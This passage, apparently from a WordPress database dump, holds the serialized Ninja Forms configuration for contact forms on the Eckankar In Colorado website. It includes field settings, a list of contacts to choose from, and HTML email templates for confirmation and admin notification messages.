Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:29:\"ESA/Initiator-Francis de Geus\";s:5:\"value\";s:28:\"ESAInitiator-Francis de Geus\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:2;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:2;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:23:\"Initiator-Vicki Cashman\";s:5:\"value\";s:23:\"Initiator-Vicki Cashman\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:3;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:24:\"Initiator-Helaine Reiner\";s:5:\"value\";s:24:\"Initiator-Helaine Reiner\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}}s:3:\"key\";s:57:\"select_the_person_you_would_like_to_contact_1613166597727\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:41:\"Select the person you would like to email\";s:9:\"field_key\";s:14:\"listselect_137\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:162;}i:7;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:12:\"textarea_138\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:12:\"textarea_138\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:163;}i:8;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663798148731\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"626\";}i:9;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_140\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_140\";}s:2:\"id\";i:165;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:15\";s:5:\"label\";s:9:\"Save Form\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:57;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:14\";s:5:\"label\";s:17:\"Send copy to user\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_132}\";s:13:\"email_subject\";s:34:\"Longmont Initiators and ESAâs\";s:13:\"email_message\";s:3759:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_130},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Longmont ECK Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_130}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_131}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_132}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_133}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_134}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166597727}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_138}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:58;}i:2;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:14\";s:5:\"label\";s:15:\"Success Message\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:11:\"success_msg\";s:361:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:59;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:14\";s:5:\"label\";s:11:\"Admin Email\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:34:\"Longmont Initiators and ESAâs\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:3292:\"<br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br ></td>                                \" valign=\"top\"><br><h1>Eckankar In Colorado</h1><br></td><td> </td></tr></tbody></table><br></td></tr><tr><td align=\"center\" valign=\"top\"><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><br><p><strong>Hello! You have a new <span style=\"color: #23507d\">Johnstown Initiators and ESAâs</span> form submission.<br>  <br> </strong><br><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Longmont ECK Leadership organization</em>.<br><br> <strong><br><br>The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #333333\">{field:firstname_1515012036721} {field:lastname_1515012040393}</span> has submitted:</strong></p><br></td></tr></tbody></table><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br ></td>                                \" valign=\"top\"><br><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:firstname_1515012036721}<br><br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_1515012040393}<br><br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong><span data-tag=\"{field:email_1515012046399}\"> {field:email_1515012046399}</span><br><br> </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_1515012055554}</span><br><br> <span style=\"color: #333333\"><strong>LOCAL AREA: </strong>{field:your_local_area_1515013258725}<br><br> </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_email_1515013520503}</span></p><br><p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:enter_your_message_here_1515013766874}</span></p><br></td></tr></tbody></table><br></td></tr><tr><td align=\"center\" valign=\"top\"><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br></td></tr></tbody></table><br></td></tr></tbody></table><br></td></tr></tbody></table><br><p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:60;}}s:8:\"settings\";a:40:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:28:\"Longmont Initiators and ESAs\";s:10:\"created_at\";s:19:\"2019-07-15 14:06:12\";s:10:\"form_title\";s:34:\"Longmont Initiators and ESAâs\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2017-07-04 17:33:42\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:10:{i:0;s:8:\"html_129\";i:1;s:11:\"textbox_130\";i:2;s:12:\"lastname_131\";i:3;s:9:\"email_132\";i:4;s:9:\"phone_133\";i:5;s:14:\"listselect_134\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166597727\";i:7;s:12:\"textarea_138\";i:8;s:18:\"html_1663798148731\";i:9;s:10:\"submit_140\";}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(16,'a:7:{s:2:\"id\";i:16;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:12:{i:0;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:193:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Loveland Leadership 